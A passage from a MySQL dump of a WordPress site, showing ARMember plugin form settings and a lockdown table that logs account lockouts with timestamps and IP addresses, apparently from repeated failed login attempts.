}s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:10:\"auto_login\";s:1:\"1\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(102,'Please Login','Please Login','login','please-login',1,'Default Set',1,0,1,'a:15:{s:22:\"registration_link_type\";s:4:\"page\";s:27:\"registration_link_type_page\";i:2043;s:25:\"forgot_password_link_type\";s:4:\"page\";s:30:\"forgot_password_link_type_page\";i:2045;s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:5:\"style\";a:88:{s:7:\"form_bg\";s:0:\"\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:11:\"form_layout\";s:13:\"writer_border\";s:12:\"form_opacity\";s:1:\"1\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:17:\"form_padding_left\";s:2:\"30\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:13:\"form_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:3:\"rtl\";i:0;s:12:\"color_scheme\";s:4:\"blue\";s:10:\"main_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:26:\"button_back_color_gradient\";s:7:\"#363795\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:27:\"button_hover_color_gradient\";s:7:\"#363795\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#E6E7F5\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"52\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:14:\"field_position\";s:4:\"left\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:18:\"button_margin_left\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:0:\"\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";}s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:61:\"<center>Dont have account? [ARMLINK]SIGNUP[/ARMLINK]</center>\";s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:18:\"Lost Your Password\";s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"315\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"0\";s:4:\"left\";s:1:\"0\";s:5:\"right\";s:1:\"0\";s:6:\"bottom\";s:1:\"0\";}s:10:\"custom_css\";s:0:\"\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(103,'Forgot Password','Forgot Password','forgot_password','forgot-password',1,'Default Set',1,0,1,'a:4:{s:5:\"style\";a:88:{s:7:\"form_bg\";s:0:\"\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:11:\"form_layout\";s:13:\"writer_border\";s:12:\"form_opacity\";s:1:\"1\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:17:\"form_padding_left\";s:2:\"30\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:13:\"form_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:3:\"rtl\";i:0;s:12:\"color_scheme\";s:4:\"blue\";s:10:\"main_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:26:\"button_back_color_gradient\";s:7:\"#363795\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:27:\"button_hover_color_gradient\";s:7:\"#363795\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#E6E7F5\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"52\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:14:\"field_position\";s:4:\"left\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:18:\"button_margin_left\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:0:\"\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";}s:13:\"redirect_type\";s:7:\"message\";s:7:\"message\";s:63:\"We have sent you a password reset link, Please check your mail.\";s:11:\"description\";s:50:\"Please enter your email address or username below.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(104,'Change Password','Change Password','change_password','change-password',1,'Default Set',1,0,1,'a:3:{s:5:\"style\";a:88:{s:7:\"form_bg\";s:0:\"\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:11:\"form_layout\";s:13:\"writer_border\";s:12:\"form_opacity\";s:1:\"1\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:17:\"form_padding_left\";s:2:\"30\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:13:\"form_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:3:\"rtl\";i:0;s:12:\"color_scheme\";s:4:\"blue\";s:10:\"main_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:14:\"field_bg_color\";s:7:\"#ffffff\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:26:\"button_back_color_gradient\";s:7:\"#363795\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:27:\"button_hover_color_gradient\";s:7:\"#363795\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#E6E7F5\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"52\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:14:\"field_position\";s:4:\"left\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:18:\"button_margin_left\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:0:\"\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";}s:13:\"redirect_type\";s:7:\"message\";s:7:\"message\";s:35:\"Your password changed successfully.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18');
/*!40000 ALTER TABLE `wp_arm_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_lockdown`
--

DROP TABLE IF EXISTS `wp_arm_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_lockdown` (
  `arm_lockdown_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `arm_user_id` bigint(20) NOT NULL,
  `arm_lockdown_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_release_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_lockdown_IP` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`arm_lockdown_ID`)
) ENGINE=InnoDB AUTO_INCREMENT=3034 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_lockdown`
--

LOCK TABLES `wp_arm_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_arm_lockdown` DISABLE KEYS */;
INSERT INTO `wp_arm_lockdown` VALUES (1,1,'2023-04-19 22:15:38','2023-04-19 22:25:38','43.135.132.48'),(2,2,'2023-04-19 22:15:39','2023-04-19 22:25:39','43.135.132.48'),(3,3,'2023-04-19 22:17:32','2023-04-19 22:27:32','43.135.132.48'),(4,4,'2023-04-19 22:17:32','2023-04-19 22:27:32','43.135.132.48'),(5,5,'2023-04-19 22:19:19','2023-04-19 22:29:19','43.135.132.48'),(6,2,'2023-04-19 22:34:11','2023-04-19 22:44:11','43.135.132.48'),(7,1,'2023-04-19 22:34:11','2023-04-19 22:44:11','43.135.132.48'),(8,4,'2023-04-19 22:36:03','2023-04-19 22:46:03','43.135.132.48'),(9,3,'2023-04-19 22:36:03','2023-04-19 22:46:03','43.135.132.48'),(10,5,'2023-04-19 22:37:55','2023-04-19 22:47:55','43.135.132.48'),(11,2,'2023-04-19 22:47:33','2023-04-20 22:47:33','43.135.132.48'),(12,5,'2023-04-19 22:49:24','2023-04-20 22:49:24','43.135.132.48'),(13,1,'2023-04-19 22:49:24','2023-04-20 22:49:24','43.135.132.48'),(14,4,'2023-04-19 22:49:24','2023-04-20 22:49:24','43.135.132.48'),(15,3,'2023-04-19 22:49:24','2023-04-20 22:49:24','43.135.132.48'),(16,1,'2023-07-06 18:19:15','2023-07-06 18:29:15','103.216.56.44'),(17,2,'2023-07-06 18:20:51','2023-07-06 18:30:51','103.216.56.44'),(18,3,'2023-07-06 18:27:12','2023-07-06 18:37:12','103.216.56.44'),(19,2,'2023-07-06 18:42:11','2023-07-06 18:52:11','103.216.56.44'),(20,1,'2023-07-06 18:43:55','2023-07-06 18:53:55','103.216.56.44'),(21,4,'2023-07-06 18:58:11','2023-07-07 18:58:11','103.216.56.44'),(22,3,'2023-07-06 18:59:57','2023-07-07 18:59:57','103.216.56.44'),(23,2,'2023-07-06 19:01:46','2023-07-07 19:01:46','103.216.56.44'),(24,1,'2023-07-06 19:03:36','2023-07-07 19:03:36','103.216.56.44'),(25,5,'2023-07-06 19:25:23','2023-07-07 19:25:23','103.216.56.44'),(26,2,'2023-07-07 23:32:40','2023-07-08 23:32:40','103.216.56.44'),(27,1,'2023-07-07 23:32:40','2023-07-08 23:32:40','103.216.56.44'),(28,3,'2023-07-07 23:40:36','2023-07-08 23:40:36','103.216.56.44'),(29,4,'2023-07-07 23:40:36','2023-07-08 23:40:36','103.216.56.44'),(30,5,'2023-07-07 23:40:36','2023-07-08 23:40:36','103.216.56.44'),(31,3,'2023-07-09 11:22:06','2023-07-09 11:32:06','157.230.219.8'),(32,2,'2023-07-09 11:25:40','2023-07-09 11:35:40','157.230.219.8'),(33,1,'2023-07-09 11:25:40','2023-07-09 11:35:40','157.230.219.8'),(34,4,'2023-07-09 11:35:58','2023-07-09 11:45:58','157.230.219.8'),(35,3,'2023-07-09 11:42:20','2023-07-09 11:52:20','157.230.219.8'),(36,1,'2023-07-09 11:46:19','2023-07-09 11:56:19','157.230.219.8'),(37,2,'2023-07-09 12:00:57','2023-07-09 12:10:57','157.230.219.8'),(38,5,'2023-07-09 12:05:05','2023-07-10 12:05:05','157.230.219.8'),(39,3,'2023-07-09 12:05:05','2023-07-10 12:05:05','157.230.219.8'),(40,1,'2023-07-09 12:05:38','2023-07-10 12:05:38','157.230.219.8'),(41,4,'2023-07-09 12:09:20','2023-07-10 12:09:20','157.230.219.8'),(42,2,'2023-07-09 12:12:01','2023-07-10 12:12:01','157.230.219.8'),(43,1,'2023-07-09 20:26:36','2023-07-09 20:36:36','172.176.92.41'),(44,1,'2023-07-10 01:19:17','2023-07-11 01:19:17','172.176.92.41'),(45,2,'2023-07-10 03:09:35','2023-07-11 03:09:35','172.176.92.41'),(46,4,'2023-07-10 03:32:07','2023-07-11 03:32:07','172.176.92.41'),(47,5,'2023-07-10 03:32:07','2023-07-11 03:32:07','172.176.92.41'),(48,3,'2023-07-10 03:32:07','2023-07-11 03:32:07','172.176.92.41'),(49,1,'2023-07-10 18:07:38','2023-07-10 18:17:38','20.242.28.188'),(50,1,'2023-07-10 22:20:30','2023-07-10 22:30:30','20.242.28.188'),(51,2,'2023-07-10 23:05:40','2023-07-11 23:05:40','103.216.56.43'),(52,1,'2023-07-10 23:05:40','2023-07-11 23:05:40','103.216.56.43'),(53,4,'2023-07-10 23:14:12','2023-07-11 23:14:12','103.216.56.43'),(54,5,'2023-07-10 23:14:12','2023-07-11 23:14:12','103.216.56.43'),(55,3,'2023-07-10 23:14:12','2023-07-11 23:14:12','103.216.56.43'),(56,1,'2023-07-11 03:03:40','2023-07-12 03:03:40','172.176.92.41'),(57,1,'2023-07-11 04:34:25','2023-07-11 04:44:25','20.98.242.90'),(58,2,'2023-07-11 04:51:15','2023-07-12 04:51:15','172.176.92.41'),(59,3,'2023-07-11 05:13:03','2023-07-12 05:13:03','172.176.92.41'),(60,4,'2023-07-11 05:13:03','2023-07-12 05:13:03','172.176.92.41'),(61,5,'2023-07-11 05:13:03','2023-07-12 05:13:03','172.176.92.41'),(62,1,'2023-07-11 05:59:30','2023-07-11 06:09:30','20.98.242.90'),(63,1,'2023-07-11 07:09:23','2023-07-12 07:09:23','20.242.28.188'),(64,1,'2023-07-12 13:53:46','2023-07-12 14:03:46','172.176.92.41'),(65,1,'2023-07-12 15:42:42','2023-07-13 15:42:42','172.176.92.41'),(66,2,'2023-07-12 16:11:03','2023-07-13 16:11:03','172.176.92.41'),(67,5,'2023-07-12 16:16:43','2023-07-13 16:16:43','172.176.92.41'),(68,4,'2023-07-12 16:16:43','2023-07-13 16:16:43','172.176.92.41'),(69,3,'2023-07-12 16:16:43','2023-07-13 16:16:43','172.176.92.41'),(70,1,'2023-07-12 21:52:22','2023-07-13 21:52:22','103.216.56.43'),(71,2,'2023-07-12 21:52:22','2023-07-13 21:52:22','103.216.56.43'),(72,5,'2023-07-12 22:09:16','2023-07-13 22:09:16','103.216.56.43'),(73,3,'2023-07-12 22:09:16','2023-07-13 22:09:16','103.216.56.43'),(74,4,'2023-07-12 22:09:17','2023-07-13 22:09:17','103.216.56.43'),(75,1,'2023-07-14 19:55:23','2023-07-14 20:05:23','20.242.28.188'),(76,1,'2023-07-14 20:06:09','2023-07-14 20:16:09','20.242.28.188'),(77,1,'2023-07-14 20:17:00','2023-07-15 20:17:00','20.242.28.188'),(78,1,'2023-07-15 17:59:52','2023-07-15 18:09:52','172.176.92.41'),(79,1,'2023-07-15 18:11:59','2023-07-15 18:21:59','172.176.92.41'),(80,1,'2023-07-15 18:23:47','2023-07-16 18:23:47','172.176.92.41'),(81,1,'2023-07-15 21:29:30','2023-07-15 21:39:30','20.242.28.188'),(82,1,'2023-07-15 21:41:03','2023-07-15 21:51:03','20.242.28.188'),(83,1,'2023-07-15 21:52:24','2023-07-16 21:52:24','20.242.28.188'),(84,2,'2023-07-16 02:21:12','2023-07-17 02:21:12','172.176.92.41'),(85,3,'2023-07-16 02:26:29','2023-07-17 02:26:29','172.176.92.41'),(86,4,'2023-07-16 02:26:29','2023-07-17 02:26:29','172.176.92.41'),(87,5,'2023-07-16 02:26:29','2023-07-17 02:26:29','172.176.92.41'),(88,1,'2023-07-16 06:10:14','2023-07-16 06:20:14','103.216.56.40'),(89,2,'2023-07-16 06:10:14','2023-07-16 06:20:14','103.216.56.40'),(90,4,'2023-07-16 06:11:37','2023-07-16 06:21:37','103.216.56.40'),(91,3,'2023-07-16 06:13:00','2023-07-16 06:23:00','103.216.56.40'),(92,1,'2023-07-16 06:30:37','2023-07-16 06:40:37','103.216.56.40'),(93,2,'2023-07-16 06:30:37','2023-07-16 06:40:37','103.216.56.40'),(94,3,'2023-07-16 06:30:37','2023-07-16 06:40:37','103.216.56.40'),(95,5,'2023-07-16 06:32:04','2023-07-16 06:42:04','103.216.56.40'),(96,4,'2023-07-16 06:33:54','2023-07-16 06:43:54','103.216.56.40'),(97,3,'2023-07-16 06:47:55','2023-07-17 06:47:55','103.216.56.40'),(98,2,'2023-07-16 06:47:55','2023-07-17 06:47:55','103.216.56.40'),(99,1,'2023-07-16 06:49:25','2023-07-17 06:49:25','103.216.56.40'),(100,4,'2023-07-16 06:52:25','2023-07-17 06:52:25','103.216.56.40'),(101,5,'2023-07-16 06:57:15','2023-07-16 07:07:15','103.216.56.40'),(102,1,'2023-07-16 13:11:01','2023-07-16 13:21:01','103.216.56.44'),(103,2,'2023-07-16 13:11:56','2023-07-16 13:21:56','103.216.56.44'),(104,4,'2023-07-16 13:14:44','2023-07-16 13:24:44','103.216.56.44'),(105,3,'2023-07-16 13:15:41','2023-07-16 13:25:41','103.216.56.44'),(106,5,'2023-07-16 13:27:22','2023-07-16 13:37:22','103.216.56.44'),(107,2,'2023-07-16 13:29:01','2023-07-16 13:39:01','103.216.56.44'),(108,1,'2023-07-16 13:29:01','2023-07-16 13:39:01','103.216.56.44'),(109,3,'2023-07-16 13:32:33','2023-07-16 13:42:33','103.216.56.44'),(110,4,'2023-07-16 13:32:35','2023-07-16 13:42:35','103.216.56.44'),(111,5,'2023-07-16 13:44:34','2023-07-16 13:54:34','103.216.56.44'),(112,1,'2023-07-16 13:46:18','2023-07-17 13:46:18','103.216.56.44'),(113,2,'2023-07-16 13:46:18','2023-07-17 13:46:18','103.216.56.44'),(114,4,'2023-07-16 13:49:41','2023-07-17 13:49:41','103.216.56.44'),(115,3,'2023-07-16 13:49:41','2023-07-17 13:49:41','103.216.56.44'),(116,5,'2023-07-16 13:54:46','2023-07-17 13:54:46','103.216.56.44'),(117,1,'2023-07-17 04:05:27','2023-07-17 04:15:27','20.163.24.111'),(118,1,'2023-07-17 04:16:10','2023-07-17 04:26:10','20.163.24.111'),(119,1,'2023-07-17 04:26:51','2023-07-18 04:26:51','20.163.24.111'),(120,1,'2023-07-17 18:15:41','2023-07-17 18:25:41','103.216.56.45'),(121,2,'2023-07-17 18:16:55','2023-07-17 18:26:55','103.216.56.45'),(122,4,'2023-07-17 18:20:40','2023-07-17 18:30:40','103.216.56.45'),(123,3,'2023-07-17 18:27:19','2023-07-17 18:37:19','103.216.56.45'),(124,1,'2023-07-17 18:32:43','2023-07-17 18:42:43','103.216.56.45'),(125,2,'2023-07-17 18:32:43','2023-07-17 18:42:43','103.216.56.45'),(126,4,'2023-07-17 18:38:27','2023-07-17 18:48:27','103.216.56.45'),(127,3,'2023-07-17 18:45:28','2023-07-17 18:55:28','103.216.56.45'),(128,2,'2023-07-17 18:49:48','2023-07-18 18:49:48','103.216.56.45'),(129,1,'2023-07-17 18:49:48','2023-07-18 18:49:48','103.216.56.45'),(130,4,'2023-07-17 18:57:10','2023-07-18 18:57:10','103.216.56.45'),(131,3,'2023-07-17 19:01:34','2023-07-18 19:01:34','103.216.56.45'),(132,5,'2023-07-17 19:07:39','2023-07-18 19:07:39','103.216.56.45'),(133,2,'2023-07-18 22:00:59','2023-07-19 22:00:59','103.216.56.45'),(134,1,'2023-07-18 22:00:59','2023-07-19 22:00:59','103.216.56.45'),(135,3,'2023-07-18 22:11:05','2023-07-19 22:11:05','103.216.56.45'),(136,4,'2023-07-18 22:11:05','2023-07-19 22:11:05','103.216.56.45'),(137,5,'2023-07-18 22:11:05','2023-07-19 22:11:05','103.216.56.45'),(138,1,'2023-07-18 23:56:49','2023-07-19 00:06:49','3.218.164.104'),(139,1,'2023-07-19 00:07:29','2023-07-19 00:17:29','3.218.164.104'),(140,1,'2023-07-19 23:45:53','2023-07-19 23:55:53','35.245.46.255'),(141,1,'2023-07-20 05:17:38','2023-07-20 05:27:38','35.245.46.255'),(142,1,'2023-07-20 12:47:04','2023-07-21 12:47:04','35.245.46.255'),(143,2,'2023-07-20 17:42:16','2023-07-21 17:42:16','4.150.19.65'),(144,1,'2023-07-20 17:42:16','2023-07-21 17:42:16','4.150.19.65'),(145,4,'2023-07-20 18:14:12','2023-07-21 18:14:12','4.150.19.65'),(146,3,'2023-07-20 18:14:12','2023-07-21 18:14:12','4.150.19.65'),(147,5,'2023-07-20 18:14:12','2023-07-21 18:14:12','4.150.19.65'),(148,2,'2023-07-20 23:40:38','2023-07-21 23:40:38','35.245.46.255'),(149,2,'2023-07-20 23:48:44','2023-07-21 23:48:44','103.216.58.86'),(150,5,'2023-07-20 23:50:41','2023-07-21 23:50:41','35.245.46.255'),(151,4,'2023-07-20 23:50:41','2023-07-21 23:50:41','35.245.46.255'),(152,3,'2023-07-20 23:50:41','2023-07-21 23:50:41','35.245.46.255'),(153,1,'2023-07-21 00:49:49','2023-07-22 00:49:49','103.216.58.86'),(154,3,'2023-07-21 01:12:14','2023-07-22 01:12:14','103.216.58.86'),(155,5,'2023-07-21 01:35:18','2023-07-22 01:35:18','103.216.58.86'),(156,4,'2023-07-21 02:20:42','2023-07-22 02:20:42','103.216.58.86'),(157,1,'2023-07-21 20:55:51','2023-07-21 21:05:51','70.37.161.83'),(158,1,'2023-07-21 21:06:37','2023-07-21 21:16:37','70.37.161.83'),(159,1,'2023-07-21 21:30:51','2023-07-22 21:30:51','70.37.161.83'),(160,2,'2023-07-22 02:39:18','2023-07-23 02:39:18','103.216.58.86'),(161,1,'2023-07-22 03:54:36','2023-07-23 03:54:36','103.216.58.86'),(162,3,'2023-07-22 04:46:37','2023-07-23 04:46:37','103.216.58.86'),(163,5,'2023-07-22 05:00:45','2023-07-23 05:00:45','103.216.58.86'),(164,4,'2023-07-22 05:43:28','2023-07-23 05:43:28','103.216.58.86'),(165,1,'2023-07-22 23:34:59','2023-07-22 23:44:59','45.77.85.38'),(166,1,'2023-07-23 01:34:06','2023-07-23 01:44:06','70.37.161.83'),(167,1,'2023-07-23 01:44:54','2023-07-23 01:54:54','70.37.161.83'),(168,1,'2023-07-23 01:55:40','2023-07-24 01:55:40','70.37.161.83'),(169,1,'2023-07-23 05:37:36','2023-07-24 05:37:36','45.77.85.38'),(170,2,'2023-07-23 19:17:07','2023-07-23 19:27:07','103.216.58.87'),(171,4,'2023-07-23 19:20:26','2023-07-23 19:30:26','103.216.58.87'),(172,1,'2023-07-23 19:21:37','2023-07-23 19:31:37','103.216.58.87'),(173,3,'2023-07-23 19:22:49','2023-07-23 19:32:49','103.216.58.87'),(174,2,'2023-07-23 19:34:24','2023-07-23 